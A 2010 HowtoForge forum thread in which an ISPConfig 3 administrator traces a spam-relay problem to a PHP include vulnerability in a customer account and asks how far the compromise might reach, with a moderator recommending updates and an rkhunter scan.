Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > Linux Forums > Server Operation

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 19th December 2010, 08:42
Mehumaija Mehumaija is offline
Junior Member
 
Join Date: Sep 2008
Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Default ISPConfig 3 – spam attack

Hello,

I recently set up an ISPConfig 3 box (been running ISPConfig 2 successfully for years). The new box was set up on Ubuntu 10.04.1 LTS using the perfect server instructions (to the best of my abilities).

However, the new machine is now being used as a spam relay. The attacker has guessed a local username (webXX@example.com) and is using that successfully as a sender address.

The server needs to accept incoming mail for the customer domains, but all real clients should authenticate themselves via SMTP auth.

What would be the usual suspects in the Postfix configuration I should be looking at?

Thanks!
Reply With Quote
Sponsored Links
  #2  
Old 19th December 2010, 10:29
Mehumaija Mehumaija is offline
Junior Member
 
Join Date: Sep 2008
Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Default Found it

OK, apparently the culprit is a vulnerable PHP application on one of the accounts, so Postfix is not at fault.

So, a related question: if a SuPHP account was compromised via a script vulnerability, what is the risk that the attacker has gained wider access (beyond just the infected account)?
Reply With Quote
  #3  
Old 19th December 2010, 11:25
till till is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,405
Thanks: 834
Thanked 5,496 Times in 4,326 Posts
Default

It is unlikely that the attacker gained wider access when you install Linux updates regulrily. Also most of these attackes were done by automatic script which are only made to send spam, so they do not even try to attacke the system behind the webspace.

Nevertehless, you should scan the system with rkhunter.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #4  
Old 19th December 2010, 11:58
Mehumaija Mehumaija is offline
Junior Member
 
Join Date: Sep 2008
Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
 
Default Intrusion method

Upon further investigation, it seems that the injection method is the one described here:

http://www.ivankristianto.com/hackin...anto-com/1503/

I have modified the offending script with the include vulnerability, and I am currently investigating how to prevent similar injections in the future (beyond reviewing all customer PHP code).
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Possible httpd server attack, may need to harden ISPCONFIG or apache isn Server Operation 6 7th December 2010 11:56
Ftp problems timeout reny2000 General 6 23rd December 2009 11:09
Under SPAM hack attack binover General 3 18th November 2008 12:45
How to Protect my ISPConfig Server from the SPAM Attack vaio1 Installation/Configuration 5 24th October 2008 21:08
Spam attack on one specific domain steowimmy Installation/Configuration 2 14th November 2006 21:12


All times are GMT +2. The time now is 01:13.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.